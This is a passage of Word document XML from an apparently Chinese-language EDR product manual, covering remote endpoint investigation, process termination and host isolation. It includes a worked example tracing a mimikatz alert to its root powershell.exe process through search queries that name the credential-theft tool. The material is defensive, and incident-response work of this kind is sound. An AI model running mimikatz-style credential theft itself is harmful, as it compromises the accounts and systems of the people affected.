      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>doc，并按终端统计，可以查看哪些终端收到过该附件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="28276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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2827655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对可疑沦陷终端，进行远程调查</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>概念</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析一个终端是否被攻击，往往需要配合该终端的多个迹象或证据来辅助判断。远程调查功能提供了可以一键提取聚合终端的日志信息的能力，如可以查看终端启动项、终端服务、计划任务等关键项信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>应对攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="780" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">打开威胁追踪 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>调查页面，输入ip或M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>、终端名称信息，点击“调查”，等待一会计算出调查结果。点击“查看”可以看详细内容，包含了终端的详细信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="23596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400040" cy="2359660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="2593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400040" cy="2593340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对恶意进程，进行处置（终止、隔离）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>概念</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果确定一个终端被攻击。需要迅速的进行处置。E</w:t>
      </w:r>
      <w:r>
        <w:t>DR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供了远程结束终端恶意进程（终止）和切断终端网络（隔离）两种处置方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>应对攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>终端进程终止和隔离有两个入口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第一个入口，从“威胁追踪”检索 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“响应”，下发结束结束进程和隔离终端任务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="27730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5400040" cy="2773045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="14712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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1471295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过任务列表，可以看到任务状态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="39941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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="3994150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二个入口：从“威胁告警”，具体到一个告警的“查看”，进入有可进行终止进程和终端隔离。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="1647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5400040" cy="1647190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="540004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400040" cy="2032635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根</w:t>
      </w:r>
      <w:r>
        <w:t>进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>溯源示</w:t>
      </w:r>
      <w:r>
        <w:t>例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以mimikazt告警为例：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>EDR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息中心，一条终端进程信息里包含了父进程的pid和进程路径。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先拿到的告警的进程是mimikazt</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe，比较遗憾告警里没有显示完整的进程链（算法导致），所以只能从mimikazt</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe开始追。但是从告警里可以拿到终端ip、pid、进程路径、命令行参数。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="1955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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1955800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据mimikazt</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe进程名与进程ip检索：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">process_name:"mimikatz.exe" AND </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "sip:%2210.95.13.12" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
        </w:rPr>
        <w:t>sip:"10.95.13.12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到</w:t>
      </w:r>
      <w:r>
        <w:t>mimikatz.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>父进程是cmd</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe，pid是1</w:t>
      </w:r>
      <w:r>
        <w:t>4160</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="25006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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2500630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继续追溯cmd.</w:t>
      </w:r>
      <w:r>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的父进程是谁。检索pid为</w:t>
      </w:r>
      <w:r>
        <w:t>14160</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的进程信息，就能知道它的父进程是谁。检索语句：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>pid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>14160</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AND </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "sip:%2210.95.13.12" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
        </w:rPr>
        <w:t>sip:"10.95.13.12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。（ip可能有重复，可以使用mid更精准。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>pid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>14160</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mid:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>90e496cc0c0a4564b7944bb2e92f6dbf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>然后点击“按进程名称统计”，可以看到有三个进程的pid都是1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4160</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，说明pid重复了，因为我们已经知道进程是cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>exe，所以只需要看cmd的进程信息即可。点击“&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”可以展开信息。看到cmd的父进程是powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>exe、pid是2744。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="15767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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1576705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="27673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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2767330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继续追溯powershell.</w:t>
      </w:r>
      <w:r>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的父进程是谁。检索语句：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>pid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>2744</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AND </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "sip:%2210.95.13.12" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
        </w:rPr>
        <w:t>sip:"10.95.13.12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>然后点击“按进程名称统计”。只看到了“ip访问”的日志，没有进程的信息。说明powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>exe是E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>能拿到的根进程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“按目的ip统计” powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
